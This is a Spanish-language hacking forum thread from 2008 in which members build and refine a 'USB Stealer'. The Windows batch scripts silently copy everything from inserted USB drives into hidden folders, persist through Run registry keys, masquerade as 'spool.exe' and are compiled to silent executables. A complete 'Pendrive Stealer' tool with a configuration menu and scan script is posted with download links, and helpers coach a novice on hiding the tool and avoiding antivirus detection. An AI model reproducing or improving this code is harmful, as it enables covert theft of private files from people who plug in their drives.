Autor
|
Tema: My USB Stealer (Leído 16,995 veces)
|
SmartGenius
Desconectado
Mensajes: 181
:P
|
Muy seguramente estan haciendo uso dle codigo que esta mas arriba....y ese tiene una linea de codigo que muestra ese aviso... y pues es para eso..para que avise... :load cls echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs start %temp%\msgr.vbs goto ini aunque deberian usar la que postee mas abajo en el cual ya quite esa funcion...simplemente empieza a escanear con base en los dos archivos previamente configurados por la interfaz...y todo lo hace da manera silenciosa.... http://rapidshare.com/files/154932419/USBStealerbySmart.rarSaludos.
|
|
|
En línea
|
|
|
|
estudcom
Desconectado
Mensajes: 9
|
oye no me funciona. Podrias hacerme el favorazo enrome de hacer un programita sencillo que solo copie documentos de Power Point y word de forma oculta y automaticamente. y nisiquiera tiene que ser configurable con que lo copie n la misma carpeta donde ponga el programa bastaria. gracias
|
|
|
En línea
|
|
|
|
corax
Desconectado
Mensajes: 220
Primum non nocere
|
Si lees los códigos que hice yo al principio del post verás que justamente lo que explican es cómo hacértelo tú mismo a partir de las plantillas que puse, todo muy casero y muy rudimentario, pero oculto y funcional. Intenta hacerlo tú, y si tienes algún problema con los códigos en batch o al compilar me comentas
|
|
|
En línea
|
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
|
|
|
estudcom
Desconectado
Mensajes: 9
|
corax me acabas de arrojar mucha luz. a veces estamos tan cerca de un problema que perdemos la perspectiva y no podemos ver las opciones. Lo que quiero decir es que voy ha ahcer lo que me has dicho pero tengo algunas dudas (sobretodo porque no se mucho de informática). Sólo quiero que me digas que es lo que tengo que cambiar para que se inicie con windows y copie todo tipo de archivos en la carpeta c:/z434733/eviews/ Me encantaría que me postearas el code modificado para lo que te pido pero por intentarlo te pongo el code como yo lo he modificado (en realidad he mezclado un poco de los dos codigos de arriva para que se inice automaticamente y para que copie todo tipo de archivos), mi mayor problema es que no se que tengo que hacer con el code: ¿lo guardo en un txt con alguna extensión especifica? ¿como se hace eso? y mi ortro problema es que no se que tengo que cambiar para que copie todo en la ruta c:/z434733/eviews/ Gracias por tu ayuda de verdad @echo off If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha) :betha MD "%PROGRAMFILES%\USB\" copy /y %0 "%PROGRAMFILES%\USB\spool.exe" reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f goto alpha :alpha If Exist "%USERPROFILE%\USB\" (goto echeck) else ( MD "%USERPROFILE%\USB\" goto echeck ) :echeck ping -n 30 localhost if exist E:\ (goto existe) else (goto fcheck) :fcheck ping -n 2 localhost if exist F:\ (goto existf) else (goto gcheck) :gcheck ping -n 2 localhost if exist G:\ (goto existg) else (goto hcheck) :hcheck ping -n 2 localhost if exist H:\ (goto existh) else (goto echeck) :existe ping -n 2 localhost xcopy E:\*.* C:\STOLEN\*.* /E /I (goto fcheck) :existf ping -n 2 localhost xcopy F:\*.* C:\STOLEN\*.* /E /I (goto gcheck) :existg xcopy G:\*.* C:\STOLEN\*.* /E /I ping -n 2 localhost (goto hcheck) :existh xcopy H:\*.* C:\STOLEN\*.* /E /I ping -n 2 localhost (goto echeck)
Una ultima cosa he estado probando por cuariosidad (aunque sin saber lo que hago realmente) y he guardado el documento de bloc de notas con la extensión .bat y no se porque no se ha creado ningun .bat, es decir, sigue siendo un archivo de bloc de notas. he probado ha cambiar la extensión a .ini y tampoco sirve. Es como si no pudiera cambiar la extensión de los archivos del bloc de notas. A mi me suena que antes podía ¿que ha podido pasar? habre cambiado algo de la configuración del ordenador sin querer?. Lo digo porque sino puedo crear la extensión que requiera este programa quizas podrias mandarme un alrchivo con esa extensión. En fin estoy aquí a la expectartiva e impaciente. Gracias y un saludo
|
|
« Última modificación: 19 Noviembre 2008, 17:13 pm por estudcom »
|
En línea
|
|
|
|
corax
Desconectado
Mensajes: 220
Primum non nocere
|
Hola estudcom,
Hay un par de cosas del code que debes cambiar:
Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del código:
Código original: xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraíble, es decir, E, F, G, H y las que tú le quieras meter si creas más redirecciones)
Códig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I
Es decir, en la segunda ruta especificas la dirección a la que se va a copiar. (NOTA: Veo que has puesto la dirección de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])
Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizá no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas símplemente "Prueba"). ¿Qué pasa en ese caso? Que al ponerle extensión .bat realmente no le estás dando una nueva extensión, ya que las tienes ocultas, sino que al archivo "prueba" le estás dando el nuevo nombre de "prueba.bat", siendo la extensión de ambos la de .txt
Resumiendo, no le estás cambiando realmente la extensión al archivo, sino que estás haciendo archivos con nombres como "prueba.bat.txt". Para corregir eso ve a la pestaña "herramientas" en cualquier carpeta, de ahí a la opción "opciones de carpeta", y una vez ahí selecciona la pestaña "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmárcala si está marcada.
De todas maneras este código no está pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.
Si te fijas, en las primeras líneas de código está la orden: copy /y %0 "%PROGRAMFILES%\USB\spool.exe" ¿Qué significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe Para que funcione correctamente al copiarse a cualquier sitio con la extensión .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.
Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las últmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que también sale.
Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en último término spool.exe) debes cambiar el nombre en la rama de:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
y en la de:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
De la misma manera, si quieres copiarlo a otra carpeta, sólo cambia las rutas de %PROGRAMFILES%\USB\ en ambas líneas.
|
|
|
En línea
|
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
|
|
|
estudcom
Desconectado
Mensajes: 9
|
guau!!! muchas gracias corax, acabas de mostrarme un mundo nuevo. No sabes el tiempo que he estado buscando como hacer un batch que fuera .exe y la solucion ante mis narices. En fin te cuento mis problemas: He creado el code tal cual me has dicho con los cambios y utilizando Quick Batch File Compiler 3.1.6.0 (espero que la versión este bien, mi antivirus no da problemas). He ido a archivos de programa y a la carpeta usb y ahí estaba el spool.exe. He reiniciado y he introducido el pen drive. He ido a la ruta y ha copiado todo!!. El problema es que después le he dado ha expulsar pen drive de forma segura y me salta el mensaje de que se está usando. Pregunta: ¿No hay alguna forma de que ese mensaje no salte? El otro problema es que he intentado reiniciar el ordenador y me saltado una ventana de que un programa aun esta ejecutandose cmd.exe o algo así y hasta que no le doy a finalizar programa no se reinicia el ordenaodr Pregunta: ¿esto es por mi ordenador o por el spool.exe? Como puedo hacer parta que tampoco salga. Como he tenido estos dos problemas he borrado la carpeta USB de Archivos de programa y el spool.exe que habia dentro (por cierto ¿así lo he quitado del todo no?). Para probar otras alternativas he usado el primer code que pusiste arriva pero un poco modificado: @echo off If Exist C:\z23856\b3637\eviews47\ (goto echeck) else ( MD C:\z23856\b3637\eviews47\ goto echeck ) :echeck ping -n 30 localhost if exist E:\ (goto existe) else (goto fcheck) :fcheck ping -n 2 localhost if exist F:\ (goto existf) else (goto gcheck) :gcheck ping -n 2 localhost if exist G:\ (goto existg) else (goto hcheck) :hcheck ping -n 2 localhost if exist H:\ (goto existh) else (goto echeck) :existe ping -n 2 localhost xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I (goto fcheck) :existf ping -n 2 localhost xcopy F:\*.* C:\z23856\b3637\eviews47\*.* /E /I (goto gcheck) :existg xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I ping -n 2 localhost (goto hcheck) :existh xcopy H:\*.* C:\z23856\b3637\eviews47\*.* /E /I ping -n 2 localhost (goto echeck)
Entonces con el Quick Batch File Compiler 3.1.6.0 he creado el .exe del batch (en el modo silencioso igual que el spool.exe) y se ha creado en la misma carpeta donde tenia el batch. Como el problema de este code es que no se inicia automáticamente con windows he hecho un acceso directo y lo he copiado a la carpeta inicio. He reiniciado y una vez iniciada la sesion he metido el pen y guay ha copiado todo el contenido. El problema sigue siendo que no me deja expulsar el pen drive de forma segura y sin embargo ya no me sale el cartel (cuando intento pagar o reiniciar el ordenador) de que hay un programa que sigue funcionando. Una cosa importante es que aun borrando todos los archivos cuando he pasado de batch a .exe (que digo yo se supone que se desinstala la aplicación) sigue copiando archivos de los pen drive que se introduzcan: ¿Como se desinstala esta aplicación completamanete?. Además me he fijado que para poder expulsar el pen drive de forma segura tengo que ir al Administrador de tareas de windows y finalizar un proceso llamado, xcopy.exe ¿esto esta relacionado no? Conclusión: Estos problemillas son por culpa de mi ordenador? quiero decir si en otro ordenador cualquiera no deberian salir esas ventanas de programas que siguen usando y si me permitiria expulsar la unidad extraible de forma segura. Y finalmente lo de que se inicie con windows en cualquier cuenta y aunque sean diferentes usuarios ¿como se introduce en el codido que te he puesto?. Muchisimas gracias por todo de verdad acabas de ayudarme ha cerrar un periodo de mi vida jeje. editado- perdona si soy pesado pero que deberia eliminar del code para que sólo copiara la unidad g o sólo la e??? He probado combinaciones y no me funciona gracias
|
|
« Última modificación: 20 Noviembre 2008, 18:10 pm por estudcom »
|
En línea
|
|
|
|
WestOn
Desconectado
Mensajes: 272
El testamento Maya...
|
Wenas, para q se ejecute al inicio: Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v NombreEtiqueta /t REG_SZ /d "UbicacionArchivo" /f
NombreEtiqueta:Lo que tu quieras. UbicacionArchivo:Ubicacion del archivo q se iniciara al inicio Respecto a lo de q solo 'detecte' las unidades G y E puedes hacer esto: @echo off If Exist C:\z23856\b3637\eviews47\ (goto echeck) else ( MD C:\z23856\b3637\eviews47\ goto echeck ) :echeck ping -n 30 localhost if exist E:\ (goto existe) else (goto fcheck) :gcheck ping -n 2 localhost if exist G:\ (goto existg) else (goto hcheck) :existe ping -n 2 localhost xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I (goto fcheck) :existg xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I ping -n 2 localhost (goto hcheck) un saludo PD:El programa Xcopy.exe es lo que hace que puedas copiar archivos de tu USB a la carpeta o viceversa.
|
|
|
En línea
|
En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
|
|
|
estudcom
Desconectado
Mensajes: 9
|
gracias west on por contestarme tan rapido. Pero, aunque me has aclarado algunas cosas, sigo necesitando ayuda porque no me funiona. Con lo que m has dicho he creado este code: @echo off If Exist "C:\z23856\2.exe" (goto alpha) else (goto betha) :betha Reg Add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v USB /t REG_SZ /d "C:\z23856\2.exe" /f goto alpha :alpha If Exist C:\z23856\b3637\eviews47\ (goto echeck) else ( MD C:\z23856\b3637\eviews47\ goto echeck ) :echeck ping -n 30 localhost if exist E:\ (goto existe) else (goto gcheck) :gcheck ping -n 2 localhost if exist G:\ (goto existg) else (goto echeck) :existe ping -n 2 localhost xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I (goto gcheck) :existg xcopy G:\*.* C:\z23856\b3637\eviews47\*.* /E /I ping -n 2 localhost (goto echeck)
He cambiado lo de (goto fcheck) y (goto hcheck) porque no existen esas "ordenes" o lo que sea. Como ves lo he cambiado sin saber mucho y basandome en los codigos de corax. El problema es que no sólo no se autoinicia sino que no copia nada. Yo creo que he escrito mal lo de para que se autoinicie. Y lo que quería saber es cual seria el code para que copie sólo la unidad e, He creado este pero no funciona: @echo off
If Exist C:\z23856\b3637\eviews47\ (goto echeck) else ( MD C:\z23856\b3637\eviews47\ goto echeck ) :echeck ping -n 30 localhost if exist E:\ (goto existe) :existe ping -n 2 localhost xcopy E:\*.* C:\z23856\b3637\eviews47\*.* /E /I
Quizas podrías crear el code para mi? ya sabeis para que se autoinicie al iniciar windows con todos los usuarios y que copie todo a c:\Z23856\B3637\EVIEWS47\
|
|
|
En línea
|
|
|
|
8789poli
Desconectado
Mensajes: 39
|
Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compañero Rockox... Mira...lo puedes descargar aqui... http://two.xthost.info/smartgenius/SourceCodeUSBStealerV1.01.ziphttp://rapidshare.com/files/122880149/USBPendriveStealerv1.01.zipEl programa consta de dos codes...uno de configuracion y uno de escaneo... USBStealer @echo off mode con cols=70 mode con lines=40 title Pendrive Stealer - Local color 0a REM Script de Copia de Dispositivos USB REM Coded by :: SmartGenius :: , RockoX
if exist "myfolder.cfg" (goto anim) else (goto ins)
:ins cls echo. echo Instalando el Programa... echo Por favor espere echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg" md "Mi Carpeta" echo "Mi Carpeta\">"myfolder.cfg" ping -n 2 0.0.0.0 > nul pause goto anim
:anim cls echo. echo ±±±±± ±±±±± echo ±±°°°°°± ±±°°°°°± echo ±°°°°°°°±± ±°°°°°°°± echo ±±°°°°°°°°°± ±±°°°°°°°°±± echo ±°°°°°°°°°°°± ±±°°°°°°°°°°°°± echo ±°°°°°°°°°°°°±± ²²²²²²²²²²²²²²²²²² ±±±°°°°°°°°°°°°°°± echo ±±°°°°°°°°°°°°±±± ²²²²±±°°°°°°°°°°°°±±²²²²±°°°°°°°°°°°°±±±±± echo ±±±±±±°°°°°°°°°±²²²²°°°°°°°°°°°°°°°°°°°°°°²²²²°°°°°°±±±±± echo ±±±°°°°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±± echo ±°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²± echo ²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°±±²² echo ²²°°°°°°°°°°²²²²°°°°°°°°²²²²°°°°°°°°°°°²² echo ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²² echo ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²² echo ²²°°°°°°°°°±²²²²°°°°°°°±²²²²°°°°°°°°°°°²² echo ²²±±°°°°°°°°°°°°°°±±±±°°°°°°°°°°°°°°°°²² echo ²²²°°°°°°°°°°°°°°²²²²°°°°°°°°°°°°°°²²²² echo ±±²²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±± echo ±±°°°°²²±°°°°°°°°°°°°°°°°°°°°°°°°°°²²°°°°°°±± echo ±±±°°°°°°°²²²²°°°°°°°°°°°°°°°°°°°°°²²²°°°°°°°°°°±±±±±±± echo ±±±±±±°°°°°°°°±±² ²²²°°°°°°°°°°°°°°°°°°²² ±±°°°°°°°°°°°°°°°±± echo ±±°°°°°°°°°°°°±± ²°°°°°°°°°°°°°°°°°°² ±±±±°°°°°°°°°°°°°± echo ±°°°°°°°°°°°±± ²°°°°°°°°°°°°°°°°°°² ±±°°°°°°°°°°±± echo ±±°°°°°°°°±± ²°°±°°±°°±°°±°°±°°°² ±°°°°°°°°±± echo ±±°°°°°±± ²²²²²²²²²²²²²²²²²²²² ±±°°°°°°± echo ±°°°±± ±°°°°± echo ±±±± ±±±± echo. echo ²²² ²²² ²² ²²² ²² ²² ²²² ² ² ²²² ²²² ²²² echo ² ² ² ² ² ² ² ² ² ² ² ² ² ² ² ² ² echo ² ² ² ² ² ²²² ²² ² ² ²²² ²² ²²² ²²² ²²² echo ² ² ² ² ² ² ² ² ² ² ² ² ² ² ² ² echo ²²² ²²² ²² ²²² ² ² ² ² ² ² ²²² ² ² ²²² echo. pause goto main
:main cls echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Pendrive Stealer v 1.0 xD º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo Elija una Opcion: echo. echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³1³ ³ Definir carpeta principal...³ ³2³ ³ Tipos de Archivos.. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³3³ ³ Iniciar Escaneo de USBs... ³ ³4³ ³ Ayuda del Programa.. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³5³ ³ Salir del Programa.. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo. set /p opc=">> " if "opc"=="" (goto main) set opc=%opc: =_%
if %opc%==1 goto dcp if %opc%==2 goto ftype if %opc%==3 goto scan if %opc%==4 goto help if %opc%==5 (goto out) else (goto err)
:err cls echo. echo ERROR... echo. echo No ha escogido una Opcion Correcta echo Vuelva a Intentarlo echo. pause goto main
:dcp cls echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Pendrive Stealer v 1.0 xD º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo En esta opcion puede definir en donde se guardaran echo los archivos copiados... echo. echo Arrastre aqui la carpeta echo. set /p dcp=">> " if "dcp"=="" (goto dcp) echo %dcp%>"myfolder.cfg" echo. echo La carpeta : %dcp% echo se ha establecido exitosamente... echo. pause goto main
:ftype cls echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Pendrive Stealer v 1.0 xD º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo Configure aqui los tipos de archivos que desea Escanear y Copiar echo. echo Elija una Opcion: echo. echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³1³ ³ Documentos... ³ ³2³ ³ Imagenes ^& Fotos.. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³3³ ³ Musica ^& Audio ³ ³4³ ³ Documentos ^& Imagenes.. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³5³ ³ Videos * ³ ³6³ ³ Todas las Opciones... * ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo. echo * Las Opciones 5 y 6 pueden tardar mas de lo normal... echo. set /p typ=">> " if "typ"=="" (goto ftype) if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap) if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap) if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap) if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap) if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap) if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap) goto main
:yap for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b echo. echo Tipos de Archivos Configurados correctamente echo. echo Archivos con Extension: %filetypes% echo. pause goto main
:scan start USBScan.bat exit
:help cls echo. echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Pendrive Stealer v 1.0 xD º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo Este programa tiene la Funcion de copiar archvos desde dispositivos echo USB, de manera silenciosa y sin levantar sospechas... echo. echo El programa puede ser congifurado facilmente, dandole opciones de echo escoger que tipos de archivos copiar y en que carpeta se deben echo guardar... echo. echo. echo Titulo: Pendrive USB Stealer, Version 1.0 Local echo Autores: :: SmartGenius ::, RockoX echo Web: http://foro.code-makers.es echo. echo SmartGenius, Corp. 2008 echo. pause goto main :out cls echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs start %temp%\msgr.vbs exit
USBScan @echo off title USB Stealer - Local color 0a
:load cls echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs start %temp%\msgr.vbs goto ini
:ini if not exist "myfolder.cfg" (goto fixfolder) for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a if not exist "ftypes.cfg" (gotp fixfiles) for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b goto main
:main for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u goto ini
:comp set unidad=%1 FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf if %errorlevel%==1 (goto usb2) for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e if %let:~-4%==ble (call :usb %unidad%) if %let:~-4%==ija (goto :eof) if %let:~-4%==ROM (goto :eof)
:usb set letra=%1 if exist "%letra%:\db.ini" goto :eof for /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%) echo USB>db.ini goto :eof
:usb2 for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n) goto ini
:fixfiles echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg" echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs start %temp%\msgr.vbs exit
:fixfolder echo "Mi Carpeta\">"myfolder.cfg" echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs start %temp%\msgr.vbs exit
Saludos. Que cosa mas presiosa me encanto XD
|
|
|
En línea
|
|
|
|
corax
Desconectado
Mensajes: 220
Primum non nocere
|
Vamos a ver que os estáis liando un poco... Te aclaro lo que intentabais averiguar WestOn y tú... Para añadir nuevas unidades al chequeo hay que seguir este patrón: · Escaneamos la primera unidad (P.E: la E) · Si existe, pasamos a la fase de copiado de esa unidad · Si no existe, pasamos a la fase de chequeo de la unidad siguiente · Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente · Cuando lleguemos a la última unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera. De otro modo no funcionará. Respecto al proceso XCOPY.exe que estaba en ejecución... si te fijas en el código se hace referencia al xcopy. ¿Qué es esto? Pues es un archivo ejecutable que funciona a través de la cmd y cuya función es copiar, en este caso el contenido íntegro de las memorias flash. Si en vez de copiarlo todo sólo quieres copiar un cierto tipo de archivos, cambia la parte del código (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensión del tipo de archivos que quieras copiar. Puedes usar varias líneas para copiar distintos tipos de archivo. Me explico: En caso de que quisieras copiar archivos de PowerPoint, cambiarías esto: xcopy H:\*.* C:\STOLEN\*.* /E /I Por esto: xcopy H:\*.* C:\STOLEN\*.ppt /E /I xcopy H:\*.* C:\STOLEN\*.pps /E /I Y así para distintos tipos de archivo, por ejemplo: xcopy H:\*.* C:\STOLEN\*.doc /E /I xcopy H:\*.* C:\STOLEN\*.xls /E /I xcopy H:\*.* C:\STOLEN\*.jpg /E /I Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado. No olvides que si vas a usar nombres de más de ocho letras o con espacios, o extensiones de más de tres letras (Formato 8/3) debes entrecomillar la ruta completa. Respecto a que las memorias flash se puedan extraer de forma segura... la única forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sólo puedes extraer una memoria flash de forma segura cuando no se está copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto. En cuanto a lo de que no se deja reiniciar, es porque el programa está haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma: Taskkill /IM cmd.exe /f (supongo que al parar el cmd.exe se paran los otros, si no añade sus nombres de la misma forma) Shutdown -r -t XX Siendo -r la opción de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...) Respecto a lo de la desinstalación... debes borrar el ejecutable que hayas creado MIENTRAS ESTÉ PARADO (de lo contrario borras el archivo, pero éste sigue cargado en memoria, es decir, ejecutándose), y además la rama del registro que ha creado. Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas. Bueno, si te queda alguna duda, házmelo saber y trataré de responderte. Nos vemos PD: 8789poli, si te gusta el código se lo agradeces por privado la próxima vez, no vayas creando posts que no aportan nada y no vienen a cuento. Venga, a cuidarse todos...
|
|
« Última modificación: 21 Noviembre 2008, 19:45 pm por corax »
|
En línea
|
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Problemas implementando un stealer...
Análisis y Diseño de Malware
|
Debci
|
9
|
5,379
|
9 Abril 2013, 11:10 am
por Debci
|
|
|
[Delphi] DH ScreenShoter Stealer 0.2
Programación General
|
BigBear
|
0
|
1,979
|
25 Noviembre 2013, 15:34 pm
por BigBear
|
|
|
[Delphi] DH WebCam Stealer 0.2
Programación General
|
BigBear
|
1
|
2,328
|
29 Noviembre 2013, 15:39 pm
por daryo
|
|
|
Ayuda Código CMD- USB Stealer
Scripting
|
shhadow9
|
5
|
3,597
|
28 Junio 2014, 07:32 am
por Eleкtro
|
|
|
stealer web y crypter
Scripting
|
arthusu
|
0
|
1,447
|
22 Junio 2018, 04:37 am
por arthusu
|
|